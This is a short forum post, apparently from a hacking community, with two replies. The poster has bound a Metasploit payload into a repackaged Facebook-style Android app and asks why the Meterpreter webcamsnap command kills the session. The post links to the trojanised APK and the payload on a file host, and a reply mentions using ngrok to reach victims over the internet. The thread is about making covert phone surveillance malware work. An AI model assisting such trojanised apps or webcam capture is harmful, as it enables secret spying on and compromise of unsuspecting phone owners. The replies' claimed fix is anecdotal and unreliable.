Hello all. I bind metasploit payload in an original apk called makifacebook.apk. All meterpreter commands work except webcamsnap. When I run webcamsnap , the apk exit and meterpreter shows Meterpreter session 1 closed. Reason: Died. Please help me.
apktool version --> 2.4.1
android version --> 7.1.2
MIUI version --> 10.3.2
computer os --> ubuntu 18.04
embed apk link -->mediafire.com/file/r3j93jybasyv9zs/bind.apk/file
original apk (makifacebook) link --> mediafire.com/file/68rbpvu5so24ml0/maki_facebook.apk/file
payload apk (created with msfvenom) --> mediafire.com/file/68rbpvu5so24ml0/maki_facebook.apk/file
permission on android --> mediafire.com/view/3z1tg2flc94sfl5/Screenshot_2020-03-10-19-11-57-021_com.miui.securitycenter.png/file
2 Responses
I also face the same problem not only in embedded apk file but also in hacking android over wan but I used ngrok(instead of port forwarding). To solve this I spent two weeks to find answer but I would not. Null Byte if you found answer for this please make a video
I found solution Null Byte. Don't use command msfconsole -q. instead use command msfconsole alone it works perfectly
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